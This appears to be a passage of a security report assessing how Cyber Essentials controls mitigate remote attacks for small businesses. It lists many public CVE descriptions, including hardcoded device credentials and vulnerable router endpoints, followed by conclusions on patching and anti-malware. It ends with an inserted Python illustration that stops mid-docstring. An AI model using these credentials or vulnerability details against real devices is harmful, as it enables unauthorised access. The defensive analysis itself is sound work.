CVE-2013-6994: OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.
CVE-2013-7004: D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.
CVE-2013-7043: Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.
CVE-2013-7389: Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.
CVE-2014-0001: Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.
CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.
CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.
CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."
CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability."
CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability."
CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0321.
CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.
CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.
CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.
CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.
CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.
CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.
CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X, and before 11.2.202.341 on Linux; Adobe AIR before 4.0.0.1628 on Android; Adobe AIR SDK before 4.0.0.1628; and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.
CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.
CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.
CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.
CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)."
CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion," a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.
CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.
CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.
CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.
CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.
CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.
CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.
CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.
CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.
CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.
CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.
CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.
CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.
CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.
CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.
CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.
CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.
CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.
CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability."
CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability."
CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability."
CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability."
CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.
CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.
CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.
CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.
CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.
CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.
CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.
CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.
CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2773.
CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.
CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2788.
CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.
CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.
CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.
CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.
CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.
CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.
CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.
CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.
CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.
CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.
CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability."
CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-4130: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4132 and CVE-2014-4138.
CVE-2014-4132: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4130 and CVE-2014-4138.
CVE-2014-4133: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4137.
CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-4481: Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.
CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.
CVE-2014-4631: RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.
CVE-2014-5528: The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2014-6040: GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.
CVE-2014-6105: IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.
CVE-2014-6136: IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.
CVE-2014-6164: IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies, and consequently obtain sensitive information, via a crafted URL.
CVE-2014-6363: vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability."
CVE-2014-6369: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-6378: Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.
CVE-2014-6487: Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.
CVE-2014-7250: The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.
CVE-2014-7927: The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.
CVE-2014-7945: OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.
CVE-2014-8447: Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.
CVE-2014-8638: The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.
CVE-2014-8835: The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.
CVE-2014-9159: Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.
CVE-2014-9163: Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.
CVE-2014-9350: TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.
CVE-2014-9357: Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.
Survey Responses
Conclusions

The Cyber Essentials security tools have been shown to mitigate, or to mitigate as soon as a patch is released, all vulnerabilities from remote attackers that do not exploit fundamentally insecure software or hardware. Of the two-hundred vulnerabilities collected, eight exploits could not be resolved by deploying security patches; for vulnerabilities such as these the only mitigation available is simply not to install the compromised systems. To help prevent deployments being susceptible to attacks on faulty systems, it may be recommended that a blacklist of such items is composed for public reference.
Scope. It is important to consider that the scope of this study covers only internet-based, commodity-level attacks, and although the Cyber Essentials tools perform very well in mitigating these, they do not represent full security. There is an increasingly identified risk from insiders that also requires attention, not least from malicious acts but also from users unknowingly compromising security.
The SMEs interviewed represent organisations from a range of market sectors: web development and online presence, specialist scientific services, the hospitality industry, and finance.
Additional Tools
The 10 Steps to Cyber Security [2] identifies additional security measures that complement the Cyber Essentials Scheme well, delivering additional security through indirect measures such as User Education and Awareness along with Network and Systems Monitoring. These additional measures would bolster cyber security by equipping each employee of the SME with the necessary knowledge of safe practice, its importance and some basic technical understanding, just as they may be versed in environmental awareness. Network and Systems Monitoring allows remote user logins, as well as file access and activity, to be logged. For very small networks this may currently be infeasible, as the extra manpower or finances required for such a system are costly. However, for larger organisations additional monitoring capability should be explored as a future extension to Cyber Essentials, not just to identify and mitigate malicious action from more bespoke and sophisticated attacks than those reported on here, but also to aid in providing evidence for any potential cyber-crime investigations.
There exist some collective approaches to improving cyber-security; a notable example is the Cyber-security Information Sharing Partnership (CiSP) [4]. The partnership aims to benefit all members by providing real-time updates on issues of cyber-security and discovered vulnerabilities, as well as best-practice guides and other cyber-threat information. It would be beneficial for more organisations to belong to cyber-security collectives like this, creating networks of informed individuals working together to tackle cyber-crime. This would be particularly useful for quickly identifying potential vulnerabilities and available patches, which, as shown in this report, is critical for the CE patch management security control to fully mitigate related vulnerabilities.
An important note concerns the security of business affiliates and service providers. Even if an SME has Cyber Essentials in place, any use of cloud services relies on the vendor's security controls for threat mitigation. In other words, cloud email, accounting and any other cloud-based or remote services are only as secure as the service provider makes them. In general, cloud providers should hold their security practice to a high level of scrutiny and should be encouraged to certify their protection. Hewlett-Packard (HP) has taken this further and has begun to strengthen its entire supply chain (600 SMEs) with the Cyber Essentials accreditation. This provides protection across the entirety of Hewlett-Packard's operations as well as its affiliates. This should be a goal for organisations of all sizes: minimising the risk from cyber-threats by ensuring all trading partners uphold the same high levels of security.
Cyber Essentials Controls
Of the five current Cyber Essentials Controls, Patch Management was considered to aid in the mitigation of the highest proportion of remote attacks (87.5%); counter-intuitively, the survey responses ranked patch management last in use among SMEs. The most widely used controls could be seen as those providing the most intuitive or easily understood protection: data loss prevention, strong passwords and firewalls. Patch management, by contrast, is not necessarily understood by individuals as a tool that greatly improves cyber-security.
Anti-Malware was useful in mitigating the fewest (10%) vulnerabilities. It is, however, important to note that Anti-Malware is largely the only security tool that may routinely scan network hardware and software, as well as any items downloaded from the internet or received as email attachments. This serves as a last line of defence and as such is vital to an organisation's cyber-safety.
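As an added illustration (not code or data from the report), the following Python tallies control coverage from rows laid out like the Cyber Controls Applicability appendix: each CVE, its exposure flags for SME1 to SME4 and the idealised network, the outcome without and with Cyber Essentials, and the controls credited. The four sample rows, the ";" separator between controls and the alias mapping that folds labels such as "Strong Passwords" into one control family are constructed assumptions, so the proportions it computes are for the sample only, not the report's 87.5% and 10% figures.

```python
"""Tally which Cyber Essentials controls are credited with mitigating each
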